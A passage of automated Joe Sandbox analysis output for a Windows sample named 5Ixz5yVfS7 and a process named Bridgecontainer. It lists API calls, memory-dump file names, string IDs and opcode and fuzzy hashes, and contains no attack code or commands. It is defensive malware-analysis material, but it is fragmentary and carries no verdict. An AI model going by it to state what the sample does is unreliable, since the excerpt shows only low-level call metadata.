                    • Part of subcall function 005A9DF1: ReleaseDC.USER32(00000000,00000000), ref: 005A9E0B
                  • GetObjectW.GDI32(?,00000018,?), ref: 005A9F8D
                    • Part of subcall function 005AA1E5: GetDC.USER32(00000000), ref: 005AA1EE
                    • Part of subcall function 005AA1E5: GetObjectW.GDI32(?,00000018,?), ref: 005AA21D
                    • Part of subcall function 005AA1E5: ReleaseDC.USER32(00000000,?), ref: 005AA2B5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ObjectRelease$CapsDevice
                  • String ID: (
                  • API String ID: 1061551593-3887548279
                  • Opcode ID: 340e989a14a04dd677a5f6db105b2389f0031bb9b9ffffb3e7a8f59973ef060f
                  • Instruction ID: 8fb2dcaeae6632c799f80013970812d07b87d8a2d0c2d8b52c2f8f561307fa79
                  • Opcode Fuzzy Hash: 340e989a14a04dd677a5f6db105b2389f0031bb9b9ffffb3e7a8f59973ef060f
                  • Instruction Fuzzy Hash: B78124B5208614AFC714DF68C844D2ABBF9FF99700F00892DF98AD7260DB31AD05DB52
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: _swprintf
                  • String ID: %ls$%s: %s
                  • API String ID: 589789837-2259941744
                  • Opcode ID: b1122f2aee8ff9811736af150326bd1483e357952252cd31e0b497dfad099f13
                  • Instruction ID: 6bf318de02d0ac259fa9ba246ab6d70d379b6e6a8d3f24a305dd3515fa594875
                  • Opcode Fuzzy Hash: b1122f2aee8ff9811736af150326bd1483e357952252cd31e0b497dfad099f13
                  • Instruction Fuzzy Hash: 4C51F83119CB41FEEE301AA4DD1AF3E7E69B747B01F204D06B7DB788D1C69254A0B616
                  APIs
                  • _free.LIBCMT ref: 005BAA84
                    • Part of subcall function 005B8849: IsProcessorFeaturePresent.KERNEL32(00000017,005B8838,00000050,005C3958,?,0059CFE0,00000004,005D0EE8,?,?,005B8845,00000000,00000000,00000000,00000000,00000000), ref: 005B884B
                    • Part of subcall function 005B8849: GetCurrentProcess.KERNEL32(C0000417,005C3958,00000050,005D0EE8), ref: 005B886D
                    • Part of subcall function 005B8849: TerminateProcess.KERNEL32(00000000), ref: 005B8874
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                  • String ID: *?$.
                  • API String ID: 2667617558-3972193922
                  • Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                  • Instruction ID: f2cbffd591a238c2c93d95914ac38240278f5acd7204de5191c316c29d991f77
                  • Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                  • Instruction Fuzzy Hash: 61517F71E0020AAFDF14DFA8C981AEDBBF5FF98310F25816AE455A7340E631AE01DB51
                  APIs
                  • __EH_prolog.LIBCMT ref: 00597730
                  • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 005978CC
                    • Part of subcall function 0059A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0059A27A,?,?,?,0059A113,?,00000001,00000000,?,?), ref: 0059A458
                    • Part of subcall function 0059A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0059A27A,?,?,?,0059A113,?,00000001,00000000,?,?), ref: 0059A489
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: File$Attributes$H_prologTime
                  • String ID: :
                  • API String ID: 1861295151-336475711
                  • Opcode ID: c7f3d90ab6f377886d288a0b14ec40d67b8534f6b98591a92b8f4af3e61ba2f9
                  • Instruction ID: dd841e6c3a68b25a1d8488eb3c12cb8b8b140d92f87ee62d3ac17497676f496c
                  • Opcode Fuzzy Hash: c7f3d90ab6f377886d288a0b14ec40d67b8534f6b98591a92b8f4af3e61ba2f9
                  • Instruction Fuzzy Hash: 2C41637190515DAADF20EB54CD59EEEBBBCFF85300F00409AB509A2092DB745F84CF61
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID:
                  • String ID: UNC$\\?\
                  • API String ID: 0-253988292
                  • Opcode ID: 037df35ab0b77e3a8f2a2b9cf87927a2033d1f4673c76591ac94bd7c1b848d43
                  • Instruction ID: 73b78f8ca54e9c0958d1de3ad9160214a6e2512163ca47f5a1b713338bd85a03
                  • Opcode Fuzzy Hash: 037df35ab0b77e3a8f2a2b9cf87927a2033d1f4673c76591ac94bd7c1b848d43
                  • Instruction Fuzzy Hash: F241913580021AAAFF20AFA1ED45EEF7FADFF85790B104525F814A7152E770EA41CB60
                  APIs
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 005A43D8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Exception@8Throw
                  • String ID: HC\$XC\
                  • API String ID: 2005118841-1792145424
                  • Opcode ID: 6b80de36b0ac0743caf664fac692bed0d35e0771b0f1084286455bf5b853e37d
                  • Instruction ID: c7285bbef7191e38e461289585205d068af1f2bc3e4b9a4baa60e0ef80b53962
                  • Opcode Fuzzy Hash: 6b80de36b0ac0743caf664fac692bed0d35e0771b0f1084286455bf5b853e37d
                  • Instruction Fuzzy Hash: 8B416A746007018FD714DF68D896BAABBE5FFD9300F05482EE99AC7251EB72E858CB41
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID:
                  • String ID: Shell.Explorer$about:blank
                  • API String ID: 0-874089819
                  • Opcode ID: 3c3ce9bd7ab14c66399e43a40bf09c8998621be912ce1adbdb3f05fd0e3e693f
                  • Instruction ID: 28d8e03a8fcd9ac39e0c65189fb00eb127dd8269bc3f448f123e42b39a61db47
                  • Opcode Fuzzy Hash: 3c3ce9bd7ab14c66399e43a40bf09c8998621be912ce1adbdb3f05fd0e3e693f
                  • Instruction Fuzzy Hash: 1F2160712143159FDB089F64C899E6E7FA9FF85751B14C56EF9098B282DB70EC01CB60
                  APIs
                  • DialogBoxParamW.USER32(GETPASSWORD1,00010406,005AA990,?,?), ref: 005AD4C5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: DialogParam
                  • String ID: GETPASSWORD1$xj^
                  • API String ID: 665744214-3588992345
                  • Opcode ID: 1c0e6f903dfa260e13558800df1a711c989e6f7c584e1a43eb7c98a0c6bc472b
                  • Instruction ID: e54a61b4f510ee2e80d3d3e43f7bf2bfa56accc180b37a01527d6be0c2915544
                  • Opcode Fuzzy Hash: 1c0e6f903dfa260e13558800df1a711c989e6f7c584e1a43eb7c98a0c6bc472b
                  • Instruction Fuzzy Hash: 941129726002456BDF22EE349C06BAE3FA8B70A755F044066BD46A7191CAF06C44D760
                  APIs
                    • Part of subcall function 0059EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0059EB92
                    • Part of subcall function 0059EB73: GetProcAddress.KERNEL32(005D81C0,CryptUnprotectMemory), ref: 0059EBA2
                  • GetCurrentProcessId.KERNEL32(?,?,?,0059EBEC), ref: 0059EC84
                  Strings
                  • CryptProtectMemory failed, xrefs: 0059EC3B
                  • CryptUnprotectMemory failed, xrefs: 0059EC7C
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AddressProc$CurrentProcess
                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                  • API String ID: 2190909847-396321323
                  • Opcode ID: 0f1a1f587a04447d34ae8b37df543df4c79ede7c1a8685bd8d5a075cd822ca29
                  • Instruction ID: 0623c0dabb1e7b1c140b410fc598b9dd3f074c8eadab5511f4b5e40eb272d756
                  • Opcode Fuzzy Hash: 0f1a1f587a04447d34ae8b37df543df4c79ede7c1a8685bd8d5a075cd822ca29
                  • Instruction Fuzzy Hash: B6112931A05629AFDF25DB34DD0BAAE7F54FF40710B04801AFC45AB282DB359E4597D4
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: _free
                  • String ID: X\
                  • API String ID: 269201875-3186185854
                  • Opcode ID: dbdfa76b9e78c162bd6969281e01ad9aa05380dfb0a6764678e0586b91950510
                  • Instruction ID: 9d75efd0b43f5c369d2e1506a759b2eaa16a6e999d3d7fc86ca17c0da9f3360d
                  • Opcode Fuzzy Hash: dbdfa76b9e78c162bd6969281e01ad9aa05380dfb0a6764678e0586b91950510
                  • Instruction Fuzzy Hash: 0411E975A00A119AEB209B7DAC45BB63FD5B761330F140616F621CB2D0EB75EC45D784
                  APIs
                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 005AF25E
                  • ___raise_securityfailure.LIBCMT ref: 005AF345
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: FeaturePresentProcessor___raise_securityfailure
                  • String ID: 8_
                  • API String ID: 3761405300-2604883730
                  • Opcode ID: 8ddc717dcf62255502056bdc4e43123559e825e5671c36cfbec3937992f20d19
                  • Instruction ID: 17d9f1eb5dec70a87c8b423e8825f3f33852b94a8dd1d3260d029da493829c3d
                  • Opcode Fuzzy Hash: 8ddc717dcf62255502056bdc4e43123559e825e5671c36cfbec3937992f20d19
                  • Instruction Fuzzy Hash: 722119B95503048BD750DF54FD85B243BA8BB69310F58682AE608CB3E2D3B95988EB45
                  APIs
                  • CreateThread.KERNEL32(00000000,00010000,005A09D0,?,00000000,00000000), ref: 005A08AD
                  • SetThreadPriority.KERNEL32(?,00000000), ref: 005A08F4
                    • Part of subcall function 00596E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00596EAF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Thread$CreatePriority__vswprintf_c_l
                  • String ID: CreateThread failed
                  • API String ID: 2655393344-3849766595
                  • Opcode ID: a2f48fbd34614611af5033a1fd627eeb71430599a17466ace5ae89e8a2942fe4
                  • Instruction ID: e41112f85347ae7658840786d2309775ded4907017f300aea6eeea804a059369
                  • Opcode Fuzzy Hash: a2f48fbd34614611af5033a1fd627eeb71430599a17466ace5ae89e8a2942fe4
                  • Instruction Fuzzy Hash: B401D6B62443076FD730AF54EC8AF6B7B98FB51711F20002FF586621C1CAA1A8459664
                  APIs
                    • Part of subcall function 005B8FA5: GetLastError.KERNEL32(?,005D0EE8,005B3E14,005D0EE8,?,?,005B3713,00000050,?,005D0EE8,00000200), ref: 005B8FA9
                    • Part of subcall function 005B8FA5: _free.LIBCMT ref: 005B8FDC
                    • Part of subcall function 005B8FA5: SetLastError.KERNEL32(00000000,?,005D0EE8,00000200), ref: 005B901D
                    • Part of subcall function 005B8FA5: _abort.LIBCMT ref: 005B9023
                  • _abort.LIBCMT ref: 005BB2E0
                  • _free.LIBCMT ref: 005BB314
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ErrorLast_abort_free
                  • String ID: \
                  • API String ID: 289325740-1951137136
                  • Opcode ID: eb6f4bcc66659508f7fa27d54582bde8e0e86807f965c5292406ba8930b68c28
                  • Instruction ID: 7b1c7364142a40113da07c3e201ef09a994a1f01c9bbb4d7cb21b38f1ff64940
                  • Opcode Fuzzy Hash: eb6f4bcc66659508f7fa27d54582bde8e0e86807f965c5292406ba8930b68c28
                  • Instruction Fuzzy Hash: D2018031D01A229FDB21AF5988076ADBFA4BF54B21B19090EE4216B681CBF07D41CFC2
                  APIs
                    • Part of subcall function 0059DA98: _swprintf.LIBCMT ref: 0059DABE
                    • Part of subcall function 0059DA98: _strlen.LIBCMT ref: 0059DADF
                    • Part of subcall function 0059DA98: SetDlgItemTextW.USER32(?,005CE154,?), ref: 0059DB3F
                    • Part of subcall function 0059DA98: GetWindowRect.USER32(?,?), ref: 0059DB79
                    • Part of subcall function 0059DA98: GetClientRect.USER32(?,?), ref: 0059DB85
                  • GetDlgItem.USER32(00000000,00003021), ref: 0059134F
                  • SetWindowTextW.USER32(00000000,005C35B4), ref: 00591365
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ItemRectTextWindow$Client_strlen_swprintf
                  • String ID: 0
                  • API String ID: 2622349952-4108050209
                  • Opcode ID: 8351093293329deaf4d9ea41db2c99ef11315bde1e39b24e1cd2f175de13570f
                  • Instruction ID: 23597ab373cd4aba9e4a5df8c4543c156e050bda7513ab1a8481a1805bdcda83
                  • Opcode Fuzzy Hash: 8351093293329deaf4d9ea41db2c99ef11315bde1e39b24e1cd2f175de13570f
                  • Instruction Fuzzy Hash: 4AF08C7010065EAADF250F608809BB93FA8BB20345F0C8818BD49945A1C778C995EA18
                  APIs
                  • WaitForSingleObject.KERNEL32(?,000000FF,005A0A78,?), ref: 005A0854
                  • GetLastError.KERNEL32(?), ref: 005A0860
                    • Part of subcall function 00596E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00596EAF
                  Strings
                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 005A0869
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                  • API String ID: 1091760877-2248577382
                  • Opcode ID: bcfaf165e05b78588bcfc915e5ca45d53edcf2366f7bc513e67eea2517bbfec6
                  • Instruction ID: cd4edb8e4d1e88de11f201b0002ddcd8538e48fe3938c4a56382114a5f6ef1bc
                  • Opcode Fuzzy Hash: bcfaf165e05b78588bcfc915e5ca45d53edcf2366f7bc513e67eea2517bbfec6
                  • Instruction Fuzzy Hash: 12D05E369084222ACF102768AC0EEAF7D19BFA2770F204719F239652F5DA25095996D5
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,0059D32F,?), ref: 0059DA53
                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0059D32F,?), ref: 0059DA61
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: FindHandleModuleResource
                  • String ID: RTL
                  • API String ID: 3537982541-834975271
                  • Opcode ID: bb6e983b0cb25365a7bc76146a1d86965a8503ec14324ee1330faea8644e730e
                  • Instruction ID: 0c5db67e59d6524343cb88489b92fb4ffffa485f8e8e749cb41063fdc6249ce2
                  • Opcode Fuzzy Hash: bb6e983b0cb25365a7bc76146a1d86965a8503ec14324ee1330faea8644e730e
                  • Instruction Fuzzy Hash: 71C01232289B54BAEB302B606C0DF832E586B20F12F09444CB241EA1D0DAE6CA4886A1
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID: N_H
                  • API String ID: 0-343878021
                  • Opcode ID: d833bf9d3e398c0c66230f0e3eb19c677d1a4df6a0b88a402c86c8ee89670dc7
                  • Instruction ID: e3c47e72fec07d4bd3d37ced719365d4848149701ab8062b335d48d65775183f
                  • Opcode Fuzzy Hash: d833bf9d3e398c0c66230f0e3eb19c677d1a4df6a0b88a402c86c8ee89670dc7
                  • Instruction Fuzzy Hash: 6A02BD3090DA8A8FEB85EB68C8587A9BBF0FF59340F5401BAC049C72D6DB786845CB55
                  Memory Dump Source
                  • Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1add6c9e7245140095d56551dbc94c8720343c468a070224e8f05864b316f82e
                  • Instruction ID: ecd13359e8d2f30a404e7b9b6a06c5746b02d544735676234ebf1f1e73a69de3
                  • Opcode Fuzzy Hash: 1add6c9e7245140095d56551dbc94c8720343c468a070224e8f05864b316f82e
